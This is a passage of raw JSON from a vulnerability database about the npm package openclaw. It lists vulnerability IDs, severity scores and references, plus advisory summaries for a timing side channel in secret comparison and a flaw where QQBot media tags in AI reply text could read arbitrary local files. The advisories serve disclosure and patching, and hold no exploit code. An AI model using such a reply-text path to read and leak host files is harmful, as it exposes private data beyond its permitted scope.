s":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-9gvx-vj57-vqqx"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/110761?format=json","purl":"pkg:npm/openclaw@2026.3.23","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{
"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{
"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{
"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{
"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.23"}],"aliases":["GHSA-9gvx-vj57-vqqx"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-8z7r-a8dv-eueb"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89861?format=json","vulnerability_id":"VCID-96jd-x87b-s3ey","summary":"OpenClaw: Shared-secret comparison call sites leaked length information through timing\n## Summary\n\nBefore OpenClaw 2026.4.2, several shared-secret comparison call sites still used early length-mismatch checks instead of the shared fixed-length comparison helper. Those paths could leak secret-length information through measurable timing differences.\n\n## Impact\n\nThe affected paths exposed a low-severity timing side channel on secret comparison. 
The issue did not by itself demonstrate auth bypass, but it weakened the intended constant-time handling for shared secrets.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.1`\n- Patched versions: `>= 2026.4.2`\n- Latest published npm version: `2026.4.1`\n\n## Fix Commit(s)\n\n- `be10ecef770a4654519869c3641bbb91087c8c7b` — reuse the shared secret comparison helper at affected call sites\n\n## Release Process Note\n\nThe fix is present on `main` and is staged for OpenClaw `2026.4.2`. Publish this advisory after the `2026.4.2` npm release is live.\n\nThanks @kexinoh of Tencent zhuque Lab (https://github.com/Tencent/AI-Infra-Guard) for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41407","reference_id":"","reference_type":"","scores":[{"value":"0.00041","scoring_system":"epss","scoring_elements":"0.12878","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00041","scoring_system":"epss","scoring_elements":"0.12844","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00041","scoring_system":"epss","scoring_elements":"0.12883","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41407"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"3.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/be10ecef770a4654519869c3641bbb91087c8c7b","reference_id":"","reference_type":"","scores":[{"value":"3.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"6.3","scoring_system":"cvs
sv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-30T12:53:09Z/"}],"url":"https://github.com/openclaw/openclaw/commit/be10ecef770a4654519869c3641bbb91087c8c7b"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-jj6q-rrrf-h66h","reference_id":"","reference_type":"","scores":[{"value":"3.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-30T12:53:09Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-jj6q-rrrf-h66h"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41407","reference_id":"","reference_type":"","scores":[{"value":"3.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41407"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-timing-side-channel-in-shared-secret-comparison","reference_id":"","re
ference_type":"","scores":[{"value":"3.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-30T12:53:09Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-timing-side-channel-in-shared-secret-comparison"},{"reference_url":"https://github.com/advisories/GHSA-jj6q-rrrf-h66h","reference_id":"GHSA-jj6q-rrrf-h66h","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-jj6q-rrrf-h66h"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109939?format=json","purl":"pkg:npm/openclaw@2026.4.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":
"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":
"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.2"}],"aliases":["CVE-2026-41407","GHSA-jj6q-rrrf-h66h"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-96jd-x87b-s3ey"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89964?format=json","vulnerability_id":"VCID-9hcd-uj62-8yeu","summary":"OpenClaw: QQBot media tags could read arbitrary local files through reply text\n## Summary\n\nQQBot media tags could read arbitrary local files through reply text.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.10`\n- Patched versions: `>= 2026.4.10`\n\n## Impact\n\nQQBot outbound media tags in AI reply text could reference host-local paths outside the intended media storage boundary, allowing local file disclosure through outbound media handling.\n\n## Technical Details\n\nThe fix enforces the media storage boundary for all outbound QQBot local file paths.\n\n## Fix\n\nThe issue was fixed in #63271. The first stable tag containing the fix is `v2026.4.10`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `604777e4414cc3b2ff8861f18f4fb04374c702c6`\n- PR: #63271\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.10 or newer. 
The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @feiyang666 of Tencent zhuque Lab (https://github.com/Tencent/AI-Infra-Guard) for reporting this issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43533","reference_id":"","reference_type":"","scores":[{"value":"0.00059","scoring_system":"epss","scoring_elements":"0.18803","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00064","scoring_system":"epss","scoring_elements":"0.20219","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00064","scoring_system":"epss","scoring_elements":"0.20258","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43533"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/604777e4414cc3b2ff8861f18f4fb04374c702c6","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"8.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-06T12:41:49Z/"}],"url":"https://github.com/openclaw/openclaw/commit/604777e4414cc3b2ff8861f18f4fb04374c702c6"},{"reference_url":"https://github.com/openclaw/openclaw/pull/63271","reference_id":"","reference_type":"","scores":[{
"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/pull/63271"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-66r7-m7xm-v49h","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"8.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-06T12:41:49Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-66r7-m7xm-v49h"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-43533","reference_id":"CVE-2026-43533","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-43533"},{"reference_url":"https://github.com/advisories/GHSA-66r7-m7xm-v49h","reference_id":"GHSA-66r7-m7xm-v49h","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-66r7-m7xm-v49h"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-arbitrary-local-file-read-via-qqbot-media-tags","reference_id":"openclaw-arbitrary-local-file-read-via-qqbot-media-tags","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N"},{"value":"8.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N
